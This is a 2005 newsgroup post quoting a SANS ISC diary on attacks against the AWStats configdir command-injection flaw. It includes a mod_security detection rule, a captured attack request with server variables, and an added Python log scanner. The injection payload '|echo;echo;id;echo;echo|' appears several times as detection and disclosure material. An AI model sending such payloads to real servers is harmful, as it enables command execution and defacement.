AWStats Exploits, Port 7162/TCP and 24212/TCP traffic, spamvertised site redirected to Al'Jazeera

http://isc.sans.org/diary.php?date=2005-01-31 

***********************************************************
Quote
***********************************************************
AWStats Exploits

A couple days ago, an advisory (e.g. see Securiteam) detailed a
vulnerability in the popular web statistics package 'AWStats'. 

We got a note from Ryan Barnet earlier, who detected an exploit
attempt for this vulnerability. The traffic was flagged using
mod_security. 

The following mod_security rule was used to detect the attempt:

/awstats/awstats.pl?configdir=|echo%20;echo%20;id;echo%20;echo|?configdir=|echo%20;echo%20;id;echo%20;echo|

Another reader reported an incident where this attack was successful.
The attacker defaced the respective website by replacing various
'index' files (index.htm, index.html, index.php). The web hosting
company that was attacked informed its clients. 

And the captured request data (I removed some lines that may reveal
too much about the attacked system): 

HTTP_ACCEPT = image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*
HTTP_ACCEPT_LANGUAGE = en-us
HTTP_HOST = www.foo.com
HTTP_MOD_SECURITY_ACTION = 403
HTTP_MOD_SECURITY_MESSAGE = Access denied with code 403. Pattern match "\;id" at THE_REQUEST
HTTP_USER_AGENT = Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)
PATH = /usr/sbin:/usr/bin
QUERY_STRING = 
REDIRECT_QUERY_STRING = configdir=|echo%20;echo%20;id;echo%20;echo|?configdir=|echo%20;echo%20;id;echo%20;echo|
REDIRECT_REQUEST_METHOD = GET
REDIRECT_SCRIPT_URI =http://www.foo.com/awstats/awstats.pl
REDIRECT_SCRIPT_URL = /awstats/awstats.pl
REDIRECT_STATUS = 403
REDIRECT_URL = /awstats/awstats.pl
REDIRECT_mod_security_relevant = 1
REMOTE_ADDR = 200.203.166.61
REMOTE_PORT = 33165
REQUEST_METHOD = GET
REQUEST_URI = /awstats/awstats.pl?configdir=|echo%20;echo%20;id;echo%20;echo|?configdir=|echo%20;echo%20;id;echo%20;echo|
SCRIPT_NAME = /cgi-bin/403.cgi
SCRIPT_URI =http://www.foo.com/awstats/awstats.pl
SCRIPT_URL = /awstats/awstats.pl
SERVER_ADDR = 192.168.1.100
SERVER_ADMIN = webmaster@foo.com
SERVER_NAME = www.foo.com
SERVER_PORT = 80
SERVER_PROTOCOL = HTTP/1.0
SERVER_SIGNATURE = 
TZ = US/Eastern


[...]

http://isc.sans.org/diary.php?date=2005-01-31

***********************************************************
Unquote
***********************************************************

-- 
Kayode Okeyode
http://del.icio.us/kayodeok
http://www.kayodeok.co.uk/weblog/
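As an added example that is not part of the original post or the ISC diary: a small Python scanner that applies the same idea as the mod_security match quoted above (shell metacharacters inside the awstats.pl configdir parameter) to constructed Apache access-log lines, one of which reuses the request URI captured in the diary. The log lines, timestamps and the benign requests are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed sample access-log lines (not from the original post). The first
# reuses the request URI captured in the diary; the other two are benign.
SAMPLE_LOG = """\
200.203.166.61 - - [31/Jan/2005:14:02:11 -0500] "GET /awstats/awstats.pl?configdir=|echo%20;echo%20;id;echo%20;echo|?configdir=|echo%20;echo%20;id;echo%20;echo| HTTP/1.0" 403 345
10.0.0.5 - - [31/Jan/2005:14:03:40 -0500] "GET /awstats/awstats.pl?config=www.foo.com&output=main HTTP/1.1" 200 18322
10.0.0.7 - - [31/Jan/2005:14:05:02 -0500] "GET /awstats/awstats.pl?configdir=%2Fetc%2Fawstats HTTP/1.1" 200 18322
"""

# Common log format: client ip, identd, user, [timestamp], "METHOD URI PROTO", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) \S+" (?P<status>\d{3})')

# Characters that a directory path passed to configdir never needs; the
# captured request wraps its injected command in '|' and separates it with ';'.
SHELL_META = re.compile(r'[|;`$&<>\n]')


def parse_line(line):
    """Split one access-log line into its fields, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def awstats_configdir_values(uri):
    """Return every URL-decoded configdir value sent to awstats.pl.

    The query is split on '&' only (not ';'), so the ';' inside an injected
    value stays part of that value and is still visible to the check."""
    parts = urlsplit(uri)
    if not parts.path.endswith('/awstats.pl'):
        return []
    values = []
    for pair in parts.query.split('&'):
        key, _, raw = pair.partition('=')
        if key.lower() == 'configdir':
            values.append(unquote_plus(raw))
    return values


def is_configdir_injection(uri):
    """True when any configdir value contains a shell metacharacter after decoding."""
    return any(SHELL_META.search(v) for v in awstats_configdir_values(uri))


def scan_log(text):
    """Return (client ip, request uri) for each line carrying an injection attempt."""
    hits = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec and is_configdir_injection(rec['uri']):
            hits.append((rec['ip'], rec['uri']))
    return hits
```

Decoding before matching matters: a request that encodes the metacharacters (e.g. %7C for '|') would slip past a raw-string match but is caught here.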
Posted to grc.security, 1/31/2005 8:08:57 PM
